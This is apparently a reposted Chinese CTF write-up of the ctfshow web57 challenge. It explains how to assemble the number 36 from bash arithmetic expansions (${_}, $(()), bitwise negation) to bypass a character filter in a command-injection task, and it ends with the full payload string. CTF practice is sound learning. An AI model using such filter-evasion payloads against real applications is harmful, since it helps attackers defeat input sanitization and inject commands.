首页 > Web开发 > 详细

ctfshow web入门 web57

时间:2020-11-24 23:01:47      阅读:110      评论:0      收藏:0      [点我收藏+]

技术分享图片

技术分享图片

看wp分析一波

只要凑出36即可

0x01

shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368

${_}:代表上一次命令执行的结果
$(()): 做运算

0x02

技术分享图片

之前没有命令返回或者执行,结果应该是空,与""等价
$((""))值为0,$((~$((""))))值为-1,再做拼接:

技术分享图片

所以可以拼接得到-37 , -37取反得到36

技术分享图片

所以payload:

$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))

技术分享图片

0x03

get到某种过滤条件下凑出数字的姿势吧

ctfshow web入门 web57

原文:https://www.cnblogs.com/l0nmar/p/14032747.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!